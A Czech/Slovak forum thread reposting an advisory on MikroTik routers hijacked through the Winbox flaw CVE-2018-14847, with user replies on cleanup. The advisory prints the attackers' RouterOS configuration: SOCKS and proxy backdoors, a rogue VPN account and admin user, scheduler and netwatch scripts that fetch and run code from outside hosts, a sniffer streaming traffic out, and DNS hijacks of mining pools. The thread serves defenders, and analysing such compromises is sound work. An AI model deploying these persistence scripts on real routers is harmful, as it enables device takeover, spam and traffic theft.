MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[roman.wifi@post.sk]

Konecne Nieco rozumne od ISPadmina...po dlhej dobe.

Jste si jistí, že nemáte v síti hacknutý MikroTik?


V poslední době jsme narazili na několik MikroTik routerů, které vypadaly na první pohled standardně (Běžel přes ně provoz. Bylo možné se na ně přihlásit pomocí Winboxu.), ale u kterých se při podrobnějším prozkoumání ukázalo, že odesílají spam přes SMTP protokol.



Pojďme se podívat na konkrétní příklad:

Během několika minut se v emailové frontě objevilo více než 50 000 emailů. To není v pořádku. Daný router používal MikroTik RouterOS ve verzi 6.42.7. Nicméně k hacknutí muselo dojít někdy mezi 1.8.2018 a 1.9.2018. V té době byla na routeru nainstalována verze 6.40.x. K upgradu na verzi 6.42.7 došlo později, kdy byl již router kompromitován.

Po analýze konfigurace routeru jsme zjistili, že na routeru byl zapnutý SOCKS server a přes něj byl celý router ovládán. SOCKS server běžel na portu 44550, ale je pravděpodobné, že používaný port může být na každém hacknutém routeru jiný.



Analýza routeru

1) SOCKS server povolen

/ip socks

set enabled=yes port=44550



2) Nová pravidla ve Firewallu
Ve firewallu byla spousta identických pravidel povolujících spojení na port 44550.


/ip firewall filter

add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp
add action=accept chain=input dst-port=44550 protocol=tcp

Celkem zde bylo 71 stejných pravidel. Pravděpodobně se při každém úspěšném útoku přidalo jedno pravidlo. To znamená, že router byl napaden celkem 71krát.



3) Web proxy na portu 52107 povolena

/ip proxy

set anonymous=yes cache-on-disk=yes cache-path=web-proxy1 enabled=yes port=52107


4) Přidána pravidla pro přesměrování portů do NATu

/ip firewall nat

add action=dst-nat chain=dst-nat dst-port=3333 protocol=tcp to-addresses=\
149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat dst-port=8888 protocol=tcp to-addresses=\
149.56.27.80 to-ports=3333
add action=dst-nat chain=dst-nat dst-port=14444 protocol=tcp to-addresses=\
209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat dst-port=8008 protocol=tcp to-addresses=\
209.239.112.96 to-ports=4444
add action=dst-nat chain=dst-nat dst-port=4444 protocol=tcp to-addresses=\
209.239.112.96 to-ports=4444




Při analýze síťového provozu je zřejmé, že na SOCKS server, na port 44550, se automaticky připojuje hned několik IP adres. Z dalších IP adres probíhalo skenování portů na otevřené služby.




5) Přidán účet pro připojení přes VPN

/ppp secret

add name=dodo password=dodo profile=dodo


6) Přidány statické DNS záznamy (Celý seznam je na konci dokumentu.)

Pokud měl nějaký počítač v síti nastavené DNS na napadený router, tak při pokusu o přístup na adresu ze seznamu byl cílový provoz přesměrován na úplně jinou IP adresu.

Přesměrování probíhalo na tyto adresy:

185.205.210.23
209.239.112.96

7) Načasované úlohy

/system scheduler

add interval=5m name=U5 on-event="/tool fetch url=http://ciskotik.com/poll/9b6\
482da-f83c-4573-af8b-d6b486188b85 mode=http dst-path=7xe7zt46hb08\r\
\n/import 7xe7zt46hb08" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
sep/06/2018 start-time=16:16:11


Scheduler se pokoušel stáhnout skript a ten následně spustit

URL http://ciskotik.com/poll/9b6482da-f83c- ... b486188b85 však již nebyla 24.9.2018 aktivní.



Další instalovaná vychytávka v Netwatch

/tool netwatch
add comment=1 host=127.0.0.1 interval=30s up-script="\r\
\n/tool fetch url=\"http://47.96.89.95:8000/autosupout.rif\" dst-path=auto\
supout.rif\r\
\n:delay 5\r\
\n/im autosupout.rif\r\
\n/file remove [find name=autosupout.rif]\r\
\n \r\
\n:delay 3\r\
\n/tool netw en [find comment=2]\r\
\n"
add comment=2 down-script="/tool net dis [find comment=1]\r\
\n:delay 30\r\
\n/tool net en [find comment=1]" host=192.168.254.123 interval=3m30s \
timeout=1ms


URL http://47.96.89.95:8000/autosupout.rif obsahuje skript



:if ([:len [/tool netw find]]=0) do={
/tool netwatch
add comment=1 host=127.0.0.1 interval=30s up-script="\r\
\n/tool fetch url=\"http://47.96.89.95:8000/autosupout.rif\" dst-path=autosu\
pout.rif\r\
\n:delay 5\r\
\n/im autosupout.rif\r\
\n/file remove [find name=autosupout.rif]\r\
\n \r\
\n:delay 3\r\
\n/tool netw en [find comment=2]\r\
\n"

add disabled=yes comment=2 down-script="/tool net dis [find comment=1]\r\
\n:delay 30\r\
\n/tool net en [find comment=1]" host=192.168.254.123 interval=3m30s \ timeout=1ms

}
:if ([/in l2tp-s ser get enabled ]=false) do={/in l2tp-s ser set en=yes}
:if ([:len [/user find name=default]]=0) do={/user add name=default pass=Jackk}


IP adresa 47.96.89.95 má podle Whois domov v Číně:



inetnum: 47.96.0.0 - 47.97.255.255
netname: ALISOFT
descr: Aliyun Computing Co., LTD
descr: 5F, Builing D, the West Lake International Plaza of S&T
descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country: CN
admin-c: ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
mnt-by: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
status: ALLOCATED PORTABLE
last-modified: 2015-02-27T01:59:04Z
source: APNIC




9) Sniffer

/tool sniffer
set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp \
filter-port=ftp-data,ftp filter-stream=yes streaming-enabled=yes \
streaming-server=125.212.228.198

Cílová IP adresa 125.212.228.198 je podle Whois ve Vietnamu:



inetnum: 125.212.128.0 - 125.212.255.255
netname: VIETTEL-VN
descr: Viettel Group
descr: No 1, Tran Huu Duc street, My Dinh 2 ward, Nam Tu Liem district, Ha Noi City
country: VN
admin-c: TVT8-AP
tech-c: NDT9-AP
remarks: For spamming matters, mail to soc@viettel.com.vn
mnt-by: MAINT-VN-VNNIC
status: ALLOCATED PORTABLE
mnt-irt: IRT-VNNIC-AP
last-modified: 2017-11-11T09:41:33Z
source: APNIC




Díky Snifferu útočníci zjistili, který SMTP server se používá pro odesílání mailu a následně jej využili k odesílání spamů.



Ke kompromitaci routeru došlo s největší pravděpodobností přes Winbox (CVE-2018-14847). Z analýzy je patrné, že hackeři této zranitelnosti využili k tomu, aby následně mohli napadené routery použít ke svým zlovolným účelům. Bližší informace naleznete na https://blog.mikrotik.com/security/winb ... ility.html nebo https://n0p.me/winbox-bug-dissection/ .



Vzhledem k tomu, že ke kompromitaci routeru došlo dříve, tak po upgradu na verzi 6.42.7 byly všechny skripty a SOCKS server aktivní, takže router byl stále pod správou útočníků.



Doporučujeme provést kontrolu routerů:



1) Zkontrolujte aktivní služby: /system services

2) Zkontrolujte, zdali není aktivní SOCKS server: /ip socks

3) Zkontrolujte, zdali není aktivní Web proxy: /ip web proxy

4) Zkontrolujte skripty: /system scripts

5) Povolte SSH, Winbox a API přístup pouze z důvěryhodných IP adres

6) Udržujte aktuální verzi RouterOS


V ISPadminu 5.02 beta1 je možné otestovat, zdali na routeru neběží Web proxy, SOCKS server a/nebo Sniffer. Také je možné provést hromadnou aktualizaci RouterOS.



V Hardware / Routery / Router status / Dashboard najdete přehled routerů MikroTik. Jsou zde zobrazeny informace o instalovaných verzích RouterOS a o aktivních službách (/ip services). Taktéž jsou zde informace o tom, zdali je na některém routeru aktivní SOCKS server a/nebo Web proxy. Kliknutím na počet routerů se zobrazí detaily.



Pokud například kliknete na číslo v řádku Telnet a sloupci Celkem, budete přesměrováni na stránku s přehledem routerů, na kterých je spuštěn Telnet.


Pokud zaškrtnete příslušné checkboxy a z pop-up menu vyberete Aktualizovat Mikrotik OS, tak se u daných routerů provede upgrade na nejnovější verzi. Routery musí mít přístup k Internetu, aby si mohly stáhnout aktualizace. Bližší informace o aktualizaci routerů najdete na https://wiki.ispadmin.eu/cz/changelog/ispadmin-5-01



Výpis statických DNS

/ip dns static
add address=185.205.210.23 name=asia1.ethermine.org
add address=185.205.210.23 name=asia1.ethpool.org
add address=185.205.210.23 name=asia1.fullhashed.com
add address=185.205.210.23 name=asia2.ethermine.org
add address=185.205.210.23 name=cn.sparkpool.com
add address=185.205.210.23 name=aurorapool.net
add address=185.205.210.23 name=daggerhashimoto.br.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.eu.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.hk.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.in.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.jp.nicehash.com
add address=185.205.210.23 name=daggerhashimoto.usa.nicehash.com
add address=185.205.210.23 name=coinotron.com
add address=185.205.210.23 name=eth.1stpool.com
add address=185.205.210.23 name=eth.anorak.tech
add address=185.205.210.23 name=eth.2miners.com
add address=185.205.210.23 name=eth.antpool.com
add address=185.205.210.23 name=eth-ar.dwarfpool.com
add address=185.205.210.23 name=eth.arsmine.net
add address=185.205.210.23 name=eth-as.coinmine.pl
add address=185.205.210.23 name=eth-asia1.nanopool.org
add address=185.205.210.23 name=eth-br.dwarfpool.com
add address=185.205.210.23 name=eth.chileminers.cl
add address=185.205.210.23 name=eth.coinfoundry.org
add address=185.205.210.23 name=eth.coinmine.pl
add address=185.205.210.23 name=ethepool.com
add address=185.205.210.23 name=ether.bw.com
add address=185.205.210.23 name=etherdig.net
add address=185.205.210.23 name=ethereum.marshsoftware.ca
add address=185.205.210.23 name=ethereumpool.club
add address=185.205.210.23 name=ethergrab.us
add address=185.205.210.23 name=ethermine.ru
add address=185.205.210.23 name=ethertrench.com
add address=185.205.210.23 name=eth.ethertrench.com
add address=185.205.210.23 name=eth-eu1.nanopool.org
add address=185.205.210.23 name=eth-eu.coinmine.pl
add address=185.205.210.23 name=eth-eu.dwarfpool.com
add address=185.205.210.23 name=eth-eu.mining.sk
add address=185.205.210.23 name=eth-eu.pool.sexy
add address=185.205.210.23 name=eth.f2pool.com
add address=185.205.210.23 name=eth.gigantpool.com
add address=185.205.210.23 name=eth.gpumine.org
add address=185.205.210.23 name=eth-hk.dwarfpool.com
add address=185.205.210.23 name=eth.miningcity.org
add address=185.205.210.23 name=eth.mymininghub.com
add address=185.205.210.23 name=eth.pool.minergate.com
add address=185.205.210.23 name=eth.poolmining.org
add address=185.205.210.23 name=eth-pool.ucrypto.net
add address=185.205.210.23 name=eth.pool.zet-tech.eu
add address=185.205.210.23 name=eth-ru.dwarfpool.com
add address=185.205.210.23 name=eth-ru.edgestile.io
add address=185.205.210.23 name=eth-ru.mining.sk
add address=185.205.210.23 name=eth-sg.dwarfpool.com
add address=185.205.210.23 name=eth.soyminero.es
add address=185.205.210.23 name=eth.suprnova.cc
add address=185.205.210.23 name=eth.uleypool.com
add address=185.205.210.23 name=eth-us.coinmine.pl
add address=185.205.210.23 name=eth-us.dwarfpool.com
add address=185.205.210.23 name=eth-us-east1.nanopool.org
add address=185.205.210.23 name=eth-us.maxhash.org
add address=185.205.210.23 name=eth-us.pool.sexy
add address=185.205.210.23 name=eth-us-west1.nanopool.org
add address=185.205.210.23 name=eth.waterhole.io
add address=185.205.210.23 name=eth.xeminer.net
add address=185.205.210.23 name=eth.zion.net.co
add address=185.205.210.23 name=eu1.ethermine.org
add address=185.205.210.23 name=eu1.ethpool.org
add address=185.205.210.23 name=eu2.ethermine.org
add address=185.205.210.23 name=eu.99miners.com
add address=185.205.210.23 name=eu.ethmine.club
add address=185.205.210.23 name=eu.sparkpool.com
add address=185.205.210.23 name=huabei2-pool.ethfans.org
add address=185.205.210.23 name=huabei-pool.ethfans.org
add address=185.205.210.23 name=miningcity.org
add address=185.205.210.23 name=my.ethpool.net
add address=185.205.210.23 name=na-west.sparkpool.com
add address=185.205.210.23 name=na-east.sparkpool.com
add address=185.205.210.23 name=noobpool.com
add address=185.205.210.23 name=pool.ethfans.org
add address=185.205.210.23 name=pool.virtualmining.pt
add address=185.205.210.23 name=s.comining.io
add address=185.205.210.23 name=us1.ethermine.org
add address=185.205.210.23 name=us1.ethpool.org
add address=185.205.210.23 name=us2.ethermine.org
add address=185.205.210.23 name=us2.ethpool.org
add address=185.205.210.23 name=vaux-all.uk
add address=209.239.112.96 name=stratum.antpool.com
add address=209.239.112.96 name=stratum.slushpool.com
add address=209.239.112.96 name=cn.stratum.slushpool.com
add address=209.239.112.96 name=eu.stratum.slushpool.com
add address=209.239.112.96 name=jp-stratum.btcc.com
add address=209.239.112.96 name=mint.bitminter.com
add address=209.239.112.96 name=us.ss.btc.com
add address=209.239.112.96 name=na-west.sparkpool.com
add address=209.239.112.96 name=asia1.ethermine.org
add address=209.239.112.96 name=na-east.sparkpool.com
add address=209.239.112.96 name=asia1.ethpool.org
add address=209.239.112.96 name=tw.sparkpool.com
add address=209.239.112.96 name=asia1.fullhashed.com
add address=209.239.112.96 name=kr.sparkpool.com
add address=209.239.112.96 name=asia2.ethermine.org
add address=209.239.112.96 name=jp.sparkpool.com
add address=209.239.112.96 name=cn.sparkpool.com
add address=209.239.112.96 name=bitcoin.viabtc.com
add address=209.239.112.96 name=aurorapool.net
add address=209.239.112.96 name=stratum-us.f2pool.com
add address=209.239.112.96 name=daggerhashimoto.br.nicehash.com
add address=209.239.112.96 name=daggerhashimoto.eu.nicehash.com
add address=209.239.112.96 name=stratum.f2pool.com
add address=209.239.112.96 name=daggerhashimoto.hk.nicehash.com
add address=209.239.112.96 name=stratum.btcguild.com
add address=209.239.112.96 name=daggerhashimoto.in.nicehash.com
add address=209.239.112.96 name=stratum.btccpool.com
add address=209.239.112.96 name=daggerhashimoto.jp.nicehash.com
add address=209.239.112.96 name=stratum.btc.top
add address=209.239.112.96 name=daggerhashimoto.usa.nicehash.com
add address=209.239.112.96 name=coinotron.com
add address=209.239.112.96 name=eth.1stpool.com
add address=209.239.112.96 name=eth.anorak.tech
add address=209.239.112.96 name=eth.2miners.com
add address=209.239.112.96 name=eth.antpool.com
add address=209.239.112.96 name=eth-ar.dwarfpool.com
add address=209.239.112.96 name=eth.arsmine.net
add address=209.239.112.96 name=eth-as.coinmine.pl
add address=209.239.112.96 name=eth-asia1.nanopool.org
add address=209.239.112.96 name=eth-br.dwarfpool.com
add address=209.239.112.96 name=eth.chileminers.cl
add address=209.239.112.96 name=eth.coinfoundry.org
add address=209.239.112.96 name=eth.coinmine.pl
add address=209.239.112.96 name=ethepool.com
add address=209.239.112.96 name=ether.bw.com
add address=209.239.112.96 name=etherdig.net
add address=209.239.112.96 name=ethereum.marshsoftware.ca
add address=209.239.112.96 name=ethereumpool.club
add address=209.239.112.96 name=ethergrab.us
add address=209.239.112.96 name=ethermine.ru
add address=209.239.112.96 name=ethertrench.com
add address=209.239.112.96 name=eth.ethertrench.com
add address=209.239.112.96 name=eth-eu1.nanopool.org
add address=209.239.112.96 name=eth-eu.coinmine.pl
add address=209.239.112.96 name=eth-eu.dwarfpool.com
add address=209.239.112.96 name=eth-eu.mining.sk
add address=209.239.112.96 name=eth-eu.pool.sexy
add address=209.239.112.96 name=eth.f2pool.com
add address=209.239.112.96 name=eth.gigantpool.com
add address=209.239.112.96 name=eth.gpumine.org
add address=209.239.112.96 name=eth-hk.dwarfpool.com
add address=209.239.112.96 name=eth.miningcity.org
add address=209.239.112.96 name=eth.mymininghub.com
add address=209.239.112.96 name=eth.pool.minergate.com
add address=209.239.112.96 name=eth.poolmining.org
add address=209.239.112.96 name=eth-pool.ucrypto.net
add address=209.239.112.96 name=eth.pool.zet-tech.eu
add address=209.239.112.96 name=eth-ru.dwarfpool.com
add address=209.239.112.96 name=eth-ru.edgestile.io
add address=209.239.112.96 name=eth-ru.mining.sk
add address=209.239.112.96 name=eth-sg.dwarfpool.com
add address=209.239.112.96 name=eth.soyminero.es
add address=209.239.112.96 name=eth.suprnova.cc
add address=209.239.112.96 name=eth.uleypool.com
add address=209.239.112.96 name=eth-us.coinmine.pl
add address=209.239.112.96 name=eth-us.dwarfpool.com
add address=209.239.112.96 name=eth-us-east1.nanopool.org
add address=209.239.112.96 name=eth-us.maxhash.org
add address=209.239.112.96 name=eth-us.pool.sexy
add address=209.239.112.96 name=eth-us-west1.nanopool.org
add address=209.239.112.96 name=eth.waterhole.io
add address=209.239.112.96 name=eth.xeminer.net
add address=209.239.112.96 name=eth.zion.net.co
add address=209.239.112.96 name=eu1.ethermine.org
add address=209.239.112.96 name=eu1.ethpool.org
add address=209.239.112.96 name=eu2.ethermine.org
add address=209.239.112.96 name=eu.99miners.com
add address=209.239.112.96 name=eu.ethmine.club
add address=209.239.112.96 name=eu.sparkpool.com
add address=209.239.112.96 name=huabei2-pool.ethfans.org
add address=209.239.112.96 name=huabei-pool.ethfans.org
add address=209.239.112.96 name=miningcity.org
add address=209.239.112.96 name=my.ethpool.net
add address=209.239.112.96 name=noobpool.com
add address=209.239.112.96 name=pool.ethfans.org
add address=209.239.112.96 name=pool.virtualmining.pt
add address=209.239.112.96 name=s.comining.io
add address=209.239.112.96 name=us1.ethermine.org
add address=209.239.112.96 name=us1.ethpool.org
add address=209.239.112.96 name=us2.ethermine.org
add address=209.239.112.96 name=us2.ethpool.org
add address=209.239.112.96 name=vaux-all.uk

[roman.wifi@post.sk]

Ako to tak teraz pozeram, tie zavirene RB, tak staci, ked RB resetnete do defaltu, potom nahrate 6.42.3 verziu, nato upgrade biosu, potom pre istotu este raz reset a malo by to byt v poriadku. Zmenit porty winboxu, hesla,.atd. a obmedzit pristup len napar IP adries.

Ak najdete jednu jedinu vec spomenutu na prispevkom hore, tak RB bolo napadnute a je teda rozumne spravit, reset pristroja..nakolko by sa tym malo uplne znemoznit pristup,.pripadne zanechat nejake dalsie dvierka pre utocnikov.

[Dalibor Toman]

...

VÚČAKO gratuluje k nejdelsimu prispevku na foru a preje hodne zdaru ve Vasi dalsi praci.

[RAket]

...

VÚČAKO gratuluje k nejdelsimu prispevku na foru a preje hodne zdaru ve Vasi dalsi praci.

Tak tak. Souhlasim. Konecne pricetny prispevek, ted uz jen zavrit toto vlakno. At se tu nemnozi dalsi balast.

[hapi3]

a co je tohle?

Faktem zůstává že než to člověk upgradnul tak už heslo bylo známo. Tim to končí. Jakákoliv další debata je vo ničem.

Dalším faktem je že ačkoliv se tu dělalo cokoliv, přišlo se na totální h*vno. Je tady mrdník.

Jediný co funguje je upgrade a zkontrolovat konfiguraci a změnit heslo. Tak si to sakra zapište nejlépe na čelo.

banda kreténů (ve smyslu inteligence)

[johnyboi]

Zkousel nekdo vydolovat cfg z hacknuteho RB? povedlo se? jestli jo zdilejte navod.

[Peyrak]

můžeš použít exploit sám a hacknout si to zpátky je tu o tom napsáno víc než dost

[whef]

https://www.root.cz/clanky/vpnfilter-je ... mikrotiky/

[puchnar]

Myslím, že toto tu ještě neproběhlo:
https://www.root.cz/clanky/vpnfilter-je-jeste-mocnejsi-malware-ma-nove-moduly-a-cili-na-mikrotiky/?ic=kolotoc-header&icc=vpnfilter-je-jeste-mocnejsi-malware-ma-nove-moduly-a-cili-na-mikrotiky

[mpcz]

Myslím, že toto tu ještě neproběhlo:
https://www.root.cz/clanky/vpnfilter-je-jeste-mocnejsi-malware-ma-nove-moduly-a-cili-na-mikrotiky/?ic=kolotoc-header&icc=vpnfilter-je-jeste-mocnejsi-malware-ma-nove-moduly-a-cili-na-mikrotiky

Zdravím, v tomto článku mě zaujala pasáž o variantě viru, který přepíše zavaděč a router prakticky zničí. Tak to by bylo bezesporu velmi, velmi nepříjemné, zvláště u těch dražších verzí. Byly tady vysloveny kategorické pochybnosti, jestli virus může blokovat netinstall. Ale tato informace něco v tomto směru naznačuje. Rozhodně by to chtělo blíže prozkoumat, jestli je to vůbec možné. Snažil jsem se o to, ale ten datasheet od Atherosu AR7241 je velmi dobře na internetu ukrytý. mpcz, 5.oct.2018

[hapi3]

hele nejsme ve 20. století aby se ničili zařízení. To pro nikoho nemá cenu. Zařízení má cenu když pracuje a vydělává a je jedno jestli pro ISPíka nebo je hacknutý a pracuje pro někoho jinýho. Navíc mikrotik nic o zavaděči nepsal a ani na foru se to nepotvrdilo.

[pavlos]

Ale on nemyslel mechanicky zničit zařízení, ale tím že máš napadené zařízení v síti s kterým nic neudělaš, tim je investice zničena. Ber ze ti všechny krabičky v síti začnou delat neplechu a ty můžeš jen odříznout páteřní spojení

[mpcz]

hele nejsme ve 20. století aby se ničili zařízení. To pro nikoho nemá cenu. Zařízení má cenu když pracuje a vydělává a je jedno jestli pro ISPíka nebo je hacknutý a pracuje pro někoho jinýho. Navíc mikrotik nic o zavaděči nepsal a ani na foru se to nepotvrdilo.

- Svatá pravda, nejsme (Hapi3, zase ta příšerná hrubka!)
- Svatá pravda, zařízení má cenu jen tehdy, když pracuje. Ale i poškození konkurence je důvod, sice velmi podlý, ale i takoví existují. A není to poškození ledajaké. Pokud je napadený drahý stroj, nemusí mít technik druhý v regálu. Výpadek se může protáhnout na delší dobu než obvykle, poslední konfigurace nemusí být někdy k dispozici, zkrátka nepříjemná představa
- Nechci samozřejmě mluvit za Mikrotik, ale já mít v něčem chybu, určitě to nebudu papouškovat do světa, dokud to neopravím. Kromě toho, ta zpráva nebyla od Mikrotiku, ale od někoho jiného.
- V té zprávě je sice slovo: stroj se "zničí", což může být i špatným pochopením nebo překladem. Já to ale s trochou fantazie čtu tak, že může být narušena pouze část zavaděče, které řídí Netinstall a vše ostatní bude fungovat.
Zhruba před měsícem mi volal pán, že má zavirovaný a zamklý hraniční router s tzv. bezpečnou verzí, bez zálohy. Nakonec však pomoc odmítl, že si to vyřeší sám, konfigurace prý byla velmi košatá, nechce o ni přijít.
Teprve včera (po měsíci) se mi tento stejný router objevil na stole. (Jeho obsah je velmi podobný s výše prezentovanou verzí kolegy roman.wifi@post.sk). Z tohoto a mnoha dalších (ověřených) případů usuzuji, ze velká část lidí provozuje zavirovaný a zamklý mikrotik i nadále, dokud ho neodemkne, (především z důvodu ztráty konfigurace), což může být nikdy. No, a pokud nebude moci udělat reset / netinstall, co udělá pak?
- To, že se to na fóru nepotvrdilo, je poněkud divný argument. Zatím se o tom ani nějak široce nediskutovalo. Víme jistě pouze to, že pár strojů takto postižených se objevilo, nevím(e) zatím spolehlivě, čím to je (několik verzí NI nepomohlo) a jediná diskuze zde ohledně tohoto byla:
Otázka: "Je to možné?", odpověď: "není". mpcz, 6.oct.2018

[pavlos]

Ja mel v nastavení firewallu hlášku ať si do určitého data aktualizuji router jinak mē ho zamkne, dal jsem novou mašinu a aktualizoval.

20181006_183819.jpg (229.54 KiB) Zobrazeno 5501 x

[Ladik]

Ahoj, tak jsem taky asi nasel jednoho zavirovaneho MikroTika.
Muzu sem postnout vse (pokud bude zajem) co jsem z nej zkopiroval, nejake scripty a php soubor s odkazem na nejaky web ciskotik.com se scriptama.
Slo se do nej normalne prihlasit, utocnik zrejme asi nestihl zmenit jmeno a heslo.
Jo bylo to z verze 6.43.2, asi si utocnik dlouho schovaval heslo a zautocil az ted.